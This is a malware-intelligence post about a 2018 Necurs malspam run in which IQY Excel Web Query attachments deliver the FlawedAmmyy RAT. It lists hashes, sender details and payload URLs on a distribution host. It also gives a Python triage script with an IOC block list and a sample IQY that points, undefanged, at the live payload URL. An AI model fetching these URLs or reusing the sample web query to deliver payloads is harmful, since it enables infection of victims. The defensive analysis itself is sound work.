Necurs Botnet Delivering FlawedAmmyy RAT - 2018-06-07

The Necurs botnet is sending out malspam carrying an IQY (Excel Web Query) attachment; the final payload appears to be the FlawedAmmyy RAT. An IQY file is plain text that tells Excel which URL to fetch data from when the file is opened, which is how the attachment reaches the first-stage download listed under "Attachment downloads".

Date/time:
2018-06-07T12:20:32

“sender” from:
“Rodney” <Rodney@mymoroccanguide[.]com>

Sender IP: 2.180.246.245
ASN: N/A
ISP: N/A

Last hop: 2.180.34.38

Shodan.io / Censys.io for last hop(s):
https://www.shodan.io/2.180.34.38
https://www.censys.io/ipv4/2.180.34.38

Headers received:
from [2[.]180[.]246[.]245] (unknown [2[.]180[.]34[.]38]) by ; Thu, 7 Jun 2018 12:20:32 +0000 (UTC)

Helo:
2[.]180[.]246[.]245

Headers x-mailer:
none

Subject line(s):
discount_30_41979464

Message Body:
“”

Attachments:
Name: discount_30_41979464.iqy
MD5: d2cbfe913c6c526ff0be6030c673dcf0
SHA1: 33956c69b3c0c714a3649788a637dfb63d22f128
SHA256: 28d391bf7aa72d59a387bfaba099d9e176ee976959a4f99b8d04dbeef75e76b5
SHA512: a2af6e73b95bb11dbaec53d1a4db9c7f01991bebae25ff99de90611e8c2075e5ec83b81975b620d3d2b8491f17fd21027a1b9932c06e8bb9464b17d1ad17660e
File type: ASCII text, with CRLF line terminators
File size: 69

Attachment downloads:
hxxp://thespecsupportservice.com/duo.dat

Name: duo.dat
MD5: 4a5776ff12c18112ca4732d01807d41e
SHA1: 02f24bd0958587c13149ec7c7ab66eec7c3c4629
SHA256: 602a7a3c6a49708a336d4c9bf63c1bd3f94e885ef7784be62e866462fe36b942
File type: ASCII text, with CRLF line terminators
File size: 181

hxxp://thespecsupportservice.com/uno.dat

Name: uno.dat
MD5: 4afc6ee5265a10af09d8479108b3a460
SHA1: 14423e725381dff490c25852774bb2757a51cabd
SHA256: 7c641ae9bfacad1e4d1d0feef3ec9e97c55c6bd66812f5d9cf2a47ba40a16dd4
File type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
File size: 316

hxxp://thespecsupportservice.com/dr.png

Name: dr.png
MD5: 28eae907ea38b050cbdcc82bb623c00a
SHA1: 713641142230fc3489cd1c4e942859890f600079
SHA256: 7f9cedd1b67cd61ba68d3536ee67efc1140bdf790b02da7aab4e5657bf48bb6f
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
File size: 178780
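The IQY attachment is only 69 bytes of ASCII, so triage is mostly a matter of pulling the URL out of the web query and matching it against the campaign IOCs. The Python below is an added example (not code from the original post or from the reporters quoted here): it parses the WEB / 1 / URL layout of an Excel Web Query, defangs the URL, flags a remote fetch, checks the host against the IOCs listed on this page, and matches attachment names against the naming pattern visible in the alternate subject lines. The sample IQY bytes are constructed to mirror this campaign; the real attachment's text is not on the page, and its length differs.

```python
"""Triage helper for Excel Web Query (.iqy) malspam attachments.

Added example, not part of the original post. Layout of an .iqy file:
line 1 "WEB", line 2 the version ("1"), line 3 the URL Excel fetches when
the file is opened, optional "Key=Value" lines after that.
"""
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample; the real attachment bytes are not shown on the page.
SAMPLE_IQY = b"WEB\r\n1\r\nhttp://thespecsupportservice.com/duo.dat\r\n"

# IOCs taken from the post: payload host and the IP it resolved to.
KNOWN_BAD_HOSTS = {"thespecsupportservice.com", "95.213.251.149"}

# Attachment / subject naming seen in this run, e.g. discount_30_41979464.iqy,
# Purchase Order_9106867360_07062018.iqy (date is ddmmyyyy of the send date).
CAMPAIGN_NAME = re.compile(
    r"^(?:(?:discount|promo|offer|sale|coupon)_\d{2}_\d+"
    r"|(?:Purchase Order|Purchase|Order|PO)_\d+_\d{8})\.iqy$"
)


def parse_iqy(data: bytes) -> dict:
    """Return the web query's version, URL and parameters; raise if not an IQY."""
    text = data.decode("utf-8-sig", errors="replace")  # tolerate a BOM
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel Web Query file")
    params = {}
    for ln in lines[3:]:
        if "=" in ln:
            key, value = ln.split("=", 1)
            params[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "params": params}


def defang(url: str) -> str:
    """hxxp://host[.]tld style so the IOC cannot be clicked by accident."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def matches_campaign_name(filename: str) -> bool:
    """True if the attachment name fits the naming pattern of this spam run."""
    return CAMPAIGN_NAME.match(filename) is not None


def triage(data: bytes) -> dict:
    """Summarise an .iqy attachment: hash, fetched URL, IOC hit and verdict."""
    query = parse_iqy(data)
    parsed = urlparse(query["url"])
    host = (parsed.hostname or "").lower()
    remote = parsed.scheme in ("http", "https", "ftp")
    known = host in KNOWN_BAD_HOSTS
    if known:
        verdict = "block (known IOC)"
    elif remote:
        verdict = "block (remote web query)"
    else:
        verdict = "review"
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "url": defang(query["url"]),
        "host": host,
        "remote_fetch": remote,
        "known_ioc": known,
        "verdict": verdict,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_IQY)
    report["name_matches_campaign"] = matches_campaign_name("discount_30_41979464.iqy")
    for key, value in report.items():
        print(f"{key}: {value}")
```

Any .iqy that names a remote URL is worth blocking at the gateway regardless of the IOC match: the file has no legitimate reason to arrive by mail from an unknown sender, and Excel will prompt to fetch the URL as soon as it is opened.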

Host details:
20180607, 95.213.251.149, AS49505, OOO Network of data-centers Selectel, hxxp://thespecsupportservice.com, Russia

https://community.riskiq.com/search/95.213.251.149
https://community.riskiq.com/search/certificate/sha1/a3f1333fe242bfcfc5d14e8f394298406810d1a0

Alternate subject lines (minus extension) and file names:
Purchase_1088448116174_07062018.iqy
promo_50_97288459.iqy_
Purchase_9732055_07062018.iqy
offer_30_109534361.iqy
Purchase_2603683074_07062018.iqy
promo_20_68412850.iqy
Order_4450324710_07062018.iqy
offer_20_3205423.iqy
promo_50_651077479.iqy
Purchase Order_9106867360_07062018.iqy
offer_50_127289968.iqy
promo_20_4070866.iqy
Order_7849285_07062018.iqy
offer_20_39474306.iqy
sale_20_580211605.iqy
offer_50_472189386.iqy
sale_30_04773200.iqy
Purchase_38665739_07062018.iqy
sale_20_12529067.iqy
promo_20_3925954.iqy
sale_30_753901522.iqy
coupon_30_159080077.iqy
Purchase Order_8130741_07062018.iqy
sale_30_159716279.iqy
PO_8588956717_07062018.iqy
offer_30_1303440.iqy
Order_6978236525663_07062018.iqy
sale_30_4938874.iqy
promo_20_58542814.iqy
Purchase Order_9190333989_07062018.iqy
coupon_20_95197460.iqy
coupon_20_6242746.iqy
sale_50_904595642.iqy
promo_20_159091579.iqy
sale_50_3688273.iqy
promo_50_116702919.iqy

Also reported by @dvk01uk & @executemalware

new Necurs iqy spam run [email protected] Random name in body hxxp://thespecsupportservice.com/duo.dat hxxp://thespecsupportservice.com/uno.dat
hxxp://thespecsupportservice.com/dr.png renamed.exe
hxxp://thespecsupportservice.com/load.png Encoded binary https://t.co/cOYgbIuc8O pic.twitter.com/8xpetUkTkj

— My Online Security (@dvk01uk) June 7, 2018

Here is some info on the flood of .iqy #malspam I've seen today as well as some details of the infection flow. #flawedammyy https://t.co/pPJGHFazQR

— ExecuteMalware (@executemalware) June 7, 2018

Find more recent and related IOCs: Necurs Botnet Delivering FlawedAmmyy RAT - 2018-05-25